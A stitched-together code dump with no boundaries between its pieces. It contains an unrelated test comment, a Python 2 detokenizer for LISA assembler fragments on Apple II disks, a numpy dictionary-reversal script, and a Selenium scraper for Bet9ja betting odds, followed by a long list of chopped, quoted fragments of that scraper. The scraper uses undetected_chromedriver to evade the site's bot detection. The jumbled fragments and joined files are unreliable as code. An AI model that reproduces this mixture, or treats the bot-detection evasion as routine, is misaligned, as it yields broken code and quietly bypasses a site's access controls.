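# arraysum_dc([1, 2, 3, 4, 5, 6, 7]) == 28, and the input list is left unchanged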
# detokenizefrag.py, from aycock/mh
# Python < 3
# see LICENSE file for licensing information

# Partial detokenization of LISA assembler fragments found in a binary file.

import sys

TOKENS = {
    # reversed by comparing assembly fragments to Mystery House disasm
    # later verified against LISA decoder at
    # https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp
    0xcb: 'jsr',
    0xca: 'jmp',
    0xac: 'tax',
    0xce: 'ldx',
    0xcd: 'lda',
    0xcf: 'ldy',
    0xd2: 'sty',
    0xd0: 'sta',
    0x96: 'brk',
    0xad: 'tay',
    0x99: 'clc',
    0xd1: 'stx',
    0xc0: 'adc',
    0xc4: 'cmp',
    # very likely but not 100% sure about these
    0x86: 'bne',
    0x87: 'beq',

    # directives prepended with '.' to distinguish from assembly instrs
    # names updated per LISA decoder at
    # https://github.com/fadden/ciderpress/blob/master/reformat/Asm.cpp
    #0xd8: '.dw',   # 2-byte word
    0xd8: '.adr',   # 2-byte word
    #0xe4: '.db',   # one or more hex bytes
    0xe4: '.hex',   # one or more hex bytes
    0xdf: '.asc',   # ASCII string, no terminator
}

def process():
    lines = disk.split(chr(0x0d))
    for line in lines:
        if len(line) == 0:
            # skip (XXX but can you have a line of length $d?)
            continue
        elif line[0] != len(line):
            if line[0] < len(line) and line[line[0]] == 0x20:
                # seems to happen with labels, kind of
                # a two-part line
                s = ''.join([ chr(b) for b in line[1:line[0]] ])
                print s
                line = line[line[0]+1:]
            else:
                # skip, probably corrupted or not part
                # of assembly fragment
                print '[...]'
                continue
        line = line[1:]     # lose length byte

        # opcode on line?
        if line[0] & 0x80:
            # opcode token and operand format byte
            if line[0] in TOKENS:
                print '\t' + TOKENS[line[0]],
            else:
                print '%02x %02x' % (line[0], line[1]),
            line = line[2:]

        # rest must be ASCII: operand, comment
        s = ''
        lastascii = True
        for b in line:
            if b >= ord(' ') and b < 127:
                s += chr(b)
                lastascii = True
            else:
                if lastascii == True and b & 0x80:
                    # high bit seems to flag the
                    # end of operand field when
                    # inline comment follows
                    s += chr(b & 0x7f)
                    lastascii = True
                else:
                    s += ' %02x ' % b
                    lastascii = False
        print s

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print 'Usage: python', sys.argv[0], '<image.dsk>'
        exit()
    f = open(sys.argv[1], 'rb')
    disk = bytearray(f.read())
    f.close()
    process()
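The script is explicitly Python 2 (`print` statements, `bytearray` split into string lines). A rough Python 3 sketch of the core record decoding, assuming the same layout the original handles: a length byte, then (if the high bit is set) an opcode token plus an operand-format byte, then ASCII text. The function name `detok_line` and the sample bytes are mine, invented for illustration:

TOKENS = {0xcb: 'jsr', 0xca: 'jmp', 0xcd: 'lda'}

def detok_line(line: bytes) -> str:
    # line[0] is the length byte; a high bit on the next byte marks
    # an opcode token followed by an operand-format byte.
    body = line[1:]
    out = ''
    if body[0] & 0x80:
        out = '\t' + TOKENS.get(body[0], '%02x' % body[0])
        body = body[2:]
    # remaining bytes are ASCII operand/comment; strip any high bits
    out += ''.join(chr(b & 0x7f) for b in body)
    return out

# Hypothetical 8-byte record: length, 'lda' token, format byte, " #$00"
print(detok_line(bytes([0x08, 0xcd, 0x00]) + b' #$00'))  # -> "\tlda #$00"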
"""
Script for generating a reversed dictionary
"""
import argparse
import numpy as np
import sys


def parse_arguments(args_to_parse):
    description = "Load a *.npy archive of a dictionary and swap (reverse) the dictionary keys and values around"
    parser = argparse.ArgumentParser(description=description)
    general = parser.add_argument_group('General options')
    general.add_argument(
        '-i', '--input-file', type=str, required=True,
        help="The file path to the word vector dictionary in *.npy format"
    )
    general.add_argument(
        '-o', '--output-file', type=str, required=True,
        help="The target file to save the reversed dictionary"
    )
    args = parser.parse_args(args_to_parse)
    return args


def main(args):
    # Loading a pickled dict requires allow_pickle=True under modern NumPy.
    wordvec = np.load(args.input_file, allow_pickle=True).item()
    reversed_wordvec = {str(v): k for k, v in wordvec.items()}
    np.save(args.output_file, reversed_wordvec)


if __name__ == '__main__':
    args = parse_arguments(sys.argv[1:])
    main(args)
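A quick round-trip check of the reversal logic, runnable without the CLI wrapper (the file path is arbitrary; `allow_pickle=True` is needed because the dict is stored as a pickled object array):

import numpy as np

wordvec = {'cat': 0, 'dog': 1}
np.save('/tmp/wordvec.npy', wordvec)

loaded = np.load('/tmp/wordvec.npy', allow_pickle=True).item()
reversed_wordvec = {str(v): k for k, v in loaded.items()}
assert reversed_wordvec == {'0': 'cat', '1': 'dog'}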
# Dependencies
# =============================================================================
import undetected_chromedriver.v2 as uc
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from bs4 import BeautifulSoup
import time
import json
import re
from pathlib import Path

# Browser Configurations
# =============================================================================
BrowserMode = uc.ChromeOptions()
BrowserMode.headless = False
BrowserMode.add_argument('--user-data-dir=./chrome_profile/')
BrowserMode.add_argument("--start-maximized")
Browser = uc.Chrome(options=BrowserMode)
actions = ActionChains(Browser)

# Websites
# =============================================================================
bet9ja = "https://sports.bet9ja.com/"

# Functions
# =============================================================================

# Bet9ja Menu
def getMenu():
    # Object
    data = {}
    # Initialise Browser
    Browser.get(bet9ja)
    # Wait
    WebDriverWait(Browser, 60).until(
        EC.presence_of_element_located((By.CLASS_NAME, 'accordion-item')))
    # Activate Menu
    Browser.find_elements(By.CLASS_NAME, "accordion-item")[0].click()
    Browser.find_element(By.ID, "left_prematch_sport-1_soccer_labelmore-toggle").click()
    # Parse HtmlDoc
    soup = BeautifulSoup(Browser.page_source, "html5lib")
    # Fetch Menu
    for div in soup.select(".accordion > .accordion-item")[0]:
        upper = div.select(".accordion-inner > .accordion-item")
        for div in upper:
            title = div.find("div", "accordion-text").get_text().strip()
            id = div.find("div", "accordion-toggle")['id']
            data[title] = {}
            data[title]['location'] = id
    # fetch Submenu and Menu link
    for each in data:
        l = data[each]['location']
        Browser.find_element(By.ID, l).click()
        # Parse HtmlDoc
        soup = BeautifulSoup(Browser.page_source, "html5lib")
        d = soup.find_all('a', 'side-nav-league__link')
        e = []
        for t in d:
            f = {}
            f['title'] = t['title']
            f['id'] = re.sub('[a-zA-Z_,]', '', t['id'])
            e.append(f)
        data[each]['submenu'] = e
    # Save as JSON
    with open('./Bet9ja/bet9ja_menu.txt', 'w') as outfile:
        json.dump(data, outfile, indent=4)
    Browser.quit()

# Bet9ja links
def getLinks_Bet9ja():
    # web prefix
    p = bet9ja + 'competition/soccer/'
    # link Object
    links = {}
    # fetch menu
    with open('./Bet9ja/bet9ja_menu.txt', 'r') as json_file:
        global data
        data = json.load(json_file)
    for e in data:
        for a in data[e]['submenu']:
            u = e.lower().replace(',', '').replace(' ', '') + '/'
            v = a['title'].lower().replace(',', '').replace(' ', '') + '/'
            w = a['id'].lower()[1:]
            # full link
            fl = p + u + v + w
            # Gather links
            links[a['title']] = fl
    # Save links
    with open('./Bet9ja/bet9ja_links.txt', 'w') as outfile:
        json.dump(links, outfile, indent=4)
    Browser.quit()

# Bet9ja Odds
# ======================================================================

# DNB
def DNB():
    # Odds
    odds = []
    # fetch links
    with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file:
        global data
        data = json.load(json_file)
    for e in data:
        # Initiate Browser
        Browser.get(data[e])
        # Wait 5 seconds
        time.sleep(5)
        # Index of target
        index = -1
        # Get index
        soup = BeautifulSoup(Browser.page_source, 'html5lib')
        box = len(soup.find_all('td', 'grid-table__td'))
        for i in range(box):
            if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'DNB':
                index = i
                break
        # Activate DNB
        if index > -1:
            Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click()
            # Wait 5 seconds
            time.sleep(5)
            # Scroll the page
            height = int(Browser.execute_script(
                'return document.body.scrollHeight'))
            for i in range(1, height, 10):
                Browser.execute_script("window.scrollTo(0, {});".format(i))
            # Wait 5 seconds
            time.sleep(5)
            # Parse HtmlDoc
            soup = BeautifulSoup(Browser.page_source, "html5lib")
            elem = soup.select('.sports-table > .table-f')
            for each in elem:
                # Compile
                info = {}
                home_team = each.find(
                    'div', 'sports-table__home').get_text().strip()
                away_team = each.find(
                    'div', 'sports-table__away').get_text().strip()
                info['category'] = e
                info['match'] = home_team + ' vs ' + away_team
                info['time'] = each.find('span').get_text().strip()
                info['home'] = each.find_all(
                    'li', 'sports-table__odds-item')[0].get_text().strip() or 0
                info['away'] = each.find_all(
                    'li', 'sports-table__odds-item')[1].get_text().strip() or 0
                # Upload
                odds.append(info)
        else:
            pass
        continue
    with open('./Bet9ja/bet9ja_DNB.txt', 'w') as outfile:
        json.dump(odds, outfile, indent=4)
    Browser.quit()

# GGNG
def GGNG():
    # Odds
    odds = []
    # fetch links
    with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file:
        global data
        data = json.load(json_file)
    for e in data:
        # Initiate Browser
        Browser.get(data[e])
        # Wait 5 seconds
        time.sleep(5)
        # Index of target
        index = -1
        # Get index
        soup = BeautifulSoup(Browser.page_source, 'html5lib')
        box = len(soup.find_all('td', 'grid-table__td'))
        for i in range(box):
            if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'GG/NG':
                index = i
                break
        # Activate GGNG
        if index > -1:
            Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click()
            # Wait 5 seconds
            time.sleep(5)
            # Scroll the page
            height = int(Browser.execute_script(
                'return document.body.scrollHeight'))
            for i in range(1, height, 10):
                Browser.execute_script("window.scrollTo(0, {});".format(i))
            # Wait 5 seconds
            time.sleep(5)
            # Parse HtmlDoc
            soup = BeautifulSoup(Browser.page_source, "html5lib")
            elem = soup.select('.sports-table > .table-f')
            for each in elem:
                # Compile
                info = {}
                home_team = each.find(
                    'div', 'sports-table__home').get_text().strip()
                away_team = each.find(
                    'div', 'sports-table__away').get_text().strip()
                info['category'] = e
                info['match'] = home_team + ' vs ' + away_team
                info['time'] = each.find('span').get_text().strip()
                info['GG'] = each.find_all(
                    'li', 'sports-table__odds-item')[0].get_text().strip() or 0
                info['NG'] = each.find_all(
                    'li', 'sports-table__odds-item')[1].get_text().strip() or 0
                # Upload
                odds.append(info)
        else:
            pass
        continue
    with open('./Bet9ja/bet9ja_GGNG.txt', 'w') as outfile:
        json.dump(odds, outfile, indent=4)
    Browser.quit()

# Double Chance and Single Chance
def DS_chance():
    # Odds
    s_odds = []
    d_odds = []
    # fetch links
    with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file:
        global data
        data = json.load(json_file)
    for e in data:
        # Initiate Browser
        Browser.get(data[e])
        # Wait 5 seconds
        time.sleep(5)
        # Scroll the page
        height = int(Browser.execute_script(
            'return document.body.scrollHeight'))
        for i in range(1, height, 10):
            Browser.execute_script("window.scrollTo(0, {});".format(i))
        # Wait 5 seconds
        time.sleep(5)
        # Parse HtmlDoc
        soup = BeautifulSoup(Browser.page_source, "html5lib")
        elem = soup.select('.sports-table > .table-f')
        for each in elem:
            # Compile
            info_1 = {}
            info_2 = {}
            home_team = each.find(
                'div', 'sports-table__home').get_text().strip()
            away_team = each.find(
                'div', 'sports-table__away').get_text().strip()
            info_1['category'] = e
            info_2['category'] = e
            info_1['match'] = home_team + ' vs ' + away_team
            info_2['match'] = home_team + ' vs ' + away_team
            info_1['time'] = each.find('span').get_text().strip()
            info_2['time'] = each.find('span').get_text().strip()
            info_1['home'] = each.find_all(
                'li', 'sports-table__odds-item')[0].get_text().strip() or 0
            info_1['away'] = each.find_all(
                'li', 'sports-table__odds-item')[2].get_text().strip() or 0
            info_2['1X'] = each.find_all(
                'li', 'sports-table__odds-item')[3].get_text().strip() or 0
            info_2['2X'] = each.find_all(
                'li', 'sports-table__odds-item')[5].get_text().strip() or 0
            # Upload
            s_odds.append(info_1)
            d_odds.append(info_2)
    with open('./Bet9ja/bet9ja_Single.txt', 'w') as outfile:
        json.dump(s_odds, outfile, indent=4)
    with open('./Bet9ja/bet9ja_Double.txt', 'w') as outfile:
        json.dump(d_odds, outfile, indent=4)
    Browser.quit()

# getMenu()
# getLinks_Bet9ja()
"' vs ' + away_team info['time'] = each.find('span').get_text().strip() info['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip()",
"'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_DNB.txt', 'w')",
"home_team + ' vs ' + away_team info['time'] = each.find('span').get_text().strip() info['GG'] = each.find_all(",
"for i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'GG/NG': index = i break",
"for each in data: l = data[each]['location'] Browser.find_element(By.ID, l).click() # Parse HtmlDoc soup",
"height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # # Wait 5 seconds time.sleep(5) # Parse HtmlDoc",
"fetch Submenu and Menu link for each in data: l = data[each]['location'] Browser.find_element(By.ID,",
"'sports-table__odds-item')[0].get_text().strip() or 0 info['NG'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload odds.append(info)",
"with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file: global data data = json.load(json_file) for e in",
"'div', 'sports-table__away').get_text().strip() info['category'] = e info['match'] = home_team + ' vs ' +",
"# ============================================================================================================= import undetected_chromedriver.v2 as uc from selenium.webdriver.common.action_chains import ActionChains from selenium.webdriver.support.ui import",
"= each.find_all( 'li', 'sports-table__odds-item')[5].get_text().strip() or 0 # Upload s_odds.append(info_1) d_odds.append(info_2) with open('./Bet9ja/bet9ja_Single.txt', 'w')",
"' vs ' + away_team info_1['time'] = each.find('span').get_text().strip() info_2['time'] = each.find('span').get_text().strip() info_1['home'] =",
"break # Activate DNB if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait 5",
"# DNB def DNB(): # Odds odds = [] # fetch links with",
"= int(Browser.execute_script( 'return document.body.scrollHeight')) for i in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) #",
"= {} info_2 = {} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find(",
"'sports-table__odds-item')[3].get_text().strip() or 0 info_2['2X'] = each.find_all( 'li', 'sports-table__odds-item')[5].get_text().strip() or 0 # Upload s_odds.append(info_1)",
"odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_GGNG.txt', 'w') as outfile: json.dump(odds, outfile, indent=4) Browser.quit()",
"Object links = {} # fetch menu with open('./Bet9ja/bet9ja_menu.txt', 'r') as json_file: global",
"Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # Wait 5 seconds time.sleep(5) # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source,",
"'grid-table__td')[i].get_text().strip() == 'GG/NG': index = i break # Activate GGNG if index >",
"= bet9ja + 'competition/soccer/' # link Object links = {} # fetch menu",
"uc.Chrome(options=BrowserMode) actions = ActionChains(Browser) # Websites # ============================================================================================================= bet9ja = \"https://sports.bet9ja.com/\" # Functions",
"BeautifulSoup import time import json import re from pathlib import Path # Browser",
"i break # Activate GGNG if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait",
"each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_DNB.txt',",
"\"left_prematch_sport-1_soccer_labelmore-toggle\").click() # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") # Fetch Menu for div",
"json.dump(odds, outfile, indent=4) Browser.quit() # GGNG def GGNG(): # Odds odds = []",
"selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By from bs4 import BeautifulSoup",
"from selenium.webdriver.common.action_chains import ActionChains from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as",
"'w') as outfile: json.dump(links, outfile, indent=4) Browser.quit() # Bet9ja Odds # ====================================================================================== #",
"or 0 # Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_DNB.txt', 'w') as outfile:",
"Browser.quit() # Bet9ja Odds # ====================================================================================== # DNB def DNB(): # Odds odds",
"time.sleep(5) # Index of target index = -1 # Get index soup =",
"= each.find('span').get_text().strip() info_1['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info_1['away'] = each.find_all( 'li',",
"indent=4) Browser.quit() # Double Chance and Single Chance def DS_chance(): # Odds s_odds",
"Wait 5 seconds time.sleep(5) # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") elem =",
"= each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['away'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0",
"# Wait WebDriverWait(Browser, 60).until( EC.presence_of_element_located((By.CLASS_NAME, 'accordion-item'))) # Activate Menu Browser.find_elements(By.CLASS_NAME, \"accordion-item\")[0].click() Browser.find_element(By.ID, \"left_prematch_sport-1_soccer_labelmore-toggle\").click()",
"'return document.body.scrollHeight')) for i in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # # Wait",
"\"https://sports.bet9ja.com/\" # Functions # ============================================================================================================= # Bet9ja Menu def getMenu(): # Object data",
"links = {} # fetch menu with open('./Bet9ja/bet9ja_menu.txt', 'r') as json_file: global data",
"[] d_odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file: global",
"BeautifulSoup(Browser.page_source, \"html5lib\") elem = soup.select('.sports-table > .table-f') for each in elem: # Compile",
"Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_GGNG.txt', 'w') as outfile: json.dump(odds, outfile, indent=4)",
"info_1['category'] = e info_2['category'] = e info_1['match'] = home_team + ' vs '",
"Object data = {} # Initialise Browser Browser.get(bet9ja) # Wait WebDriverWait(Browser, 60).until( EC.presence_of_element_located((By.CLASS_NAME,",
"{} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info_1['category'] =",
"= each.find_all( 'li', 'sports-table__odds-item')[3].get_text().strip() or 0 info_2['2X'] = each.find_all( 'li', 'sports-table__odds-item')[5].get_text().strip() or 0",
"Upload s_odds.append(info_1) d_odds.append(info_2) with open('./Bet9ja/bet9ja_Single.txt', 'w') as outfile: json.dump(s_odds, outfile, indent=4) with open('./Bet9ja/bet9ja_Double.txt',",
"i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'DNB': index = i break #",
"index = i break # Activate DNB if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click()",
"'side-nav-league__link') e = [] for t in d: f = {} f['title'] =",
"'') + '/' w = a['id'].lower()[1:] # full link fl = p +",
"and Single Chance def DS_chance(): # Odds s_odds = [] d_odds = []",
"with open('./Bet9ja/bet9ja_links.txt', 'w') as outfile: json.dump(links, outfile, indent=4) Browser.quit() # Bet9ja Odds #",
"in upper: title = div.find(\"div\", \"accordion-text\").get_text().strip() id = div.find(\"div\", \"accordion-toggle\")['id'] data[title] = {}",
"height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # Wait 5 seconds time.sleep(5) # Parse HtmlDoc soup",
"or 0 # Upload s_odds.append(info_1) d_odds.append(info_2) with open('./Bet9ja/bet9ja_Single.txt', 'w') as outfile: json.dump(s_odds, outfile,",
"away_team info_1['time'] = each.find('span').get_text().strip() info_2['time'] = each.find('span').get_text().strip() info_1['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or",
"def GGNG(): # Odds odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r')",
"e in data: # Initiate Browser Browser.get(data[e]) # Wait 5 seconds time.sleep(5) #",
"in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'GG/NG': index = i break # Activate",
"10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # # Wait 5 seconds time.sleep(5) # Parse HtmlDoc soup",
"============================================================================================================= import undetected_chromedriver.v2 as uc from selenium.webdriver.common.action_chains import ActionChains from selenium.webdriver.support.ui import WebDriverWait",
"soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'DNB': index = i break # Activate DNB if index",
"'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['away'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload",
"0 # Upload s_odds.append(info_1) d_odds.append(info_2) with open('./Bet9ja/bet9ja_Single.txt', 'w') as outfile: json.dump(s_odds, outfile, indent=4)",
"= data[each]['location'] Browser.find_element(By.ID, l).click() # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") d =",
"as outfile: json.dump(s_odds, outfile, indent=4) with open('./Bet9ja/bet9ja_Double.txt', 'w') as outfile: json.dump(d_odds, outfile, indent=4)",
"e in data: for a in data[e]['submenu']: u = e.lower().replace(',', '').replace(' ', '')",
"'sports-table__away').get_text().strip() info['category'] = e info['match'] = home_team + ' vs ' + away_team",
"if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'DNB': index = i break # Activate DNB if",
"p = bet9ja + 'competition/soccer/' # link Object links = {} # fetch",
"in elem: # Compile info_1 = {} info_2 = {} home_team = each.find(",
"\"accordion-item\")[0].click() Browser.find_element(By.ID, \"left_prematch_sport-1_soccer_labelmore-toggle\").click() # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") # Fetch Menu",
"+ v + w # Gather links links[a['title']] = fl # Save links",
"{});\".format(i)) # Wait 5 seconds time.sleep(5) # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\")",
"# Activate GGNG if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait 5 seconds",
"in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # Wait 5 seconds time.sleep(5) # Parse",
"# Bet9ja Odds # ====================================================================================== # DNB def DNB(): # Odds odds =",
"= {} data[title]['location'] = id # fetch Submenu and Menu link for each",
".table-f') for each in elem: # Compile info_1 = {} info_2 = {}",
"BeautifulSoup(Browser.page_source, \"html5lib\") d = soup.find_all('a', 'side-nav-league__link') e = [] for t in d:",
"{});\".format(i)) # # Wait 5 seconds time.sleep(5) # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source,",
"= home_team + ' vs ' + away_team info_1['time'] = each.find('span').get_text().strip() info_2['time'] =",
"info['category'] = e info['match'] = home_team + ' vs ' + away_team info['time']",
"link fl = p + u + v + w # Gather links",
"info['match'] = home_team + ' vs ' + away_team info['time'] = each.find('span').get_text().strip() info['GG']",
"0 info_1['away'] = each.find_all( 'li', 'sports-table__odds-item')[2].get_text().strip() or 0 info_2['1X'] = each.find_all( 'li', 'sports-table__odds-item')[3].get_text().strip()",
"info = {} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip()",
"{} # fetch menu with open('./Bet9ja/bet9ja_menu.txt', 'r') as json_file: global data data =",
"data = json.load(json_file) for e in data: for a in data[e]['submenu']: u =",
"= a['id'].lower()[1:] # full link fl = p + u + v +",
"open('./Bet9ja/bet9ja_links.txt', 'w') as outfile: json.dump(links, outfile, indent=4) Browser.quit() # Bet9ja Odds # ======================================================================================",
"outfile, indent=4) Browser.quit() # Bet9ja Odds # ====================================================================================== # DNB def DNB(): #",
"data[e]['submenu']: u = e.lower().replace(',', '').replace(' ', '') + '/' v = a['title'].lower().replace(',', '').replace('",
"[] for t in d: f = {} f['title'] = t['title'] f['id'] =",
"+ away_team info['time'] = each.find('span').get_text().strip() info['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['away']",
"height = int(Browser.execute_script( 'return document.body.scrollHeight')) for i in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i))",
"'html5lib') box = len(soup.find_all('td', 'grid-table__td')) for i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() ==",
"indent=4) Browser.quit() # GGNG def GGNG(): # Odds odds = [] # fetch",
"HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") elem = soup.select('.sports-table > .table-f') for each in",
"fetch menu with open('./Bet9ja/bet9ja_menu.txt', 'r') as json_file: global data data = json.load(json_file) for",
"= soup.find_all('a', 'side-nav-league__link') e = [] for t in d: f = {}",
"= each.find( 'div', 'sports-table__away').get_text().strip() info_1['category'] = e info_2['category'] = e info_1['match'] = home_team",
"l).click() # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") d = soup.find_all('a', 'side-nav-league__link') e",
"e info_2['category'] = e info_1['match'] = home_team + ' vs ' + away_team",
"seconds time.sleep(5) # Scroll the page height = int(Browser.execute_script( 'return document.body.scrollHeight')) for i",
"indent=4) Browser.quit() # Bet9ja Odds # ====================================================================================== # DNB def DNB(): # Odds",
"Index of target index = -1 # Get index soup = BeautifulSoup(Browser.page_source, 'html5lib')",
"# Odds odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file:",
"as outfile: json.dump(odds, outfile, indent=4) Browser.quit() # Double Chance and Single Chance def",
"def DS_chance(): # Odds s_odds = [] d_odds = [] # fetch links",
"div.find(\"div\", \"accordion-text\").get_text().strip() id = div.find(\"div\", \"accordion-toggle\")['id'] data[title] = {} data[title]['location'] = id #",
"away_team info['time'] = each.find('span').get_text().strip() info['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['away'] =",
"\"html5lib\") elem = soup.select('.sports-table > .table-f') for each in elem: # Compile info_1",
"# Activate Menu Browser.find_elements(By.CLASS_NAME, \"accordion-item\")[0].click() Browser.find_element(By.ID, \"left_prematch_sport-1_soccer_labelmore-toggle\").click() # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source,",
"= each.find_all( 'li', 'sports-table__odds-item')[2].get_text().strip() or 0 info_2['1X'] = each.find_all( 'li', 'sports-table__odds-item')[3].get_text().strip() or 0",
"as outfile: json.dump(odds, outfile, indent=4) Browser.quit() # GGNG def GGNG(): # Odds odds",
"in elem: # Compile info = {} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team",
"each in data: l = data[each]['location'] Browser.find_element(By.ID, l).click() # Parse HtmlDoc soup =",
"Browser = uc.Chrome(options=BrowserMode) actions = ActionChains(Browser) # Websites # ============================================================================================================= bet9ja = \"https://sports.bet9ja.com/\"",
"Menu for div in soup.select(\".accordion > .accordion-item\")[0]: upper = div.select(\".accordion-inner > .accordion-item\") for",
"upper = div.select(\".accordion-inner > .accordion-item\") for div in upper: title = div.find(\"div\", \"accordion-text\").get_text().strip()",
"fl = p + u + v + w # Gather links links[a['title']]",
"s_odds = [] d_odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as",
"== 'GG/NG': index = i break # Activate GGNG if index > -1:",
"import By from bs4 import BeautifulSoup import time import json import re from",
"elem = soup.select('.sports-table > .table-f') for each in elem: # Compile info =",
"links links[a['title']] = fl # Save links with open('./Bet9ja/bet9ja_links.txt', 'w') as outfile: json.dump(links,",
"Browser.find_element(By.ID, l).click() # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") d = soup.find_all('a', 'side-nav-league__link')",
"'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info['category'] = e info['match'] = home_team",
"fl # Save links with open('./Bet9ja/bet9ja_links.txt', 'w') as outfile: json.dump(links, outfile, indent=4) Browser.quit()",
"odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_DNB.txt', 'w') as outfile: json.dump(odds, outfile, indent=4) Browser.quit()",
"# Activate DNB if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait 5 seconds",
"= div.find(\"div\", \"accordion-toggle\")['id'] data[title] = {} data[title]['location'] = id # fetch Submenu and",
"+ '/' v = a['title'].lower().replace(',', '').replace(' ', '') + '/' w = a['id'].lower()[1:]",
"w = a['id'].lower()[1:] # full link fl = p + u + v",
"box = len(soup.find_all('td', 'grid-table__td')) for i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'GG/NG':",
"'sports-table__odds-item')[5].get_text().strip() or 0 # Upload s_odds.append(info_1) d_odds.append(info_2) with open('./Bet9ja/bet9ja_Single.txt', 'w') as outfile: json.dump(s_odds,",
"Menu link for each in data: l = data[each]['location'] Browser.find_element(By.ID, l).click() # Parse",
"t in d: f = {} f['title'] = t['title'] f['id'] = re.sub('[a-zA-Z_,]', '',",
"t['id']) e.append(f) data[each]['submenu'] = e # Save as JSON with open('./Bet9ja/bet9ja_menu.txt', 'w') as",
"vs ' + away_team info['time'] = each.find('span').get_text().strip() info['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or",
"# ============================================================================================================= BrowserMode = uc.ChromeOptions() BrowserMode.headless = False BrowserMode.add_argument('--user-data-dir=./chrome_profile/') BrowserMode.add_argument(\"--start-maximized\") Browser = uc.Chrome(options=BrowserMode)",
"+ 'competition/soccer/' # link Object links = {} # fetch menu with open('./Bet9ja/bet9ja_menu.txt',",
"expected_conditions as EC from selenium.webdriver.common.by import By from bs4 import BeautifulSoup import time",
"each.find('span').get_text().strip() info_1['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info_1['away'] = each.find_all( 'li', 'sports-table__odds-item')[2].get_text().strip()",
"in data[e]['submenu']: u = e.lower().replace(',', '').replace(' ', '') + '/' v = a['title'].lower().replace(',',",
"from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By from bs4 import",
"+ '/' w = a['id'].lower()[1:] # full link fl = p + u",
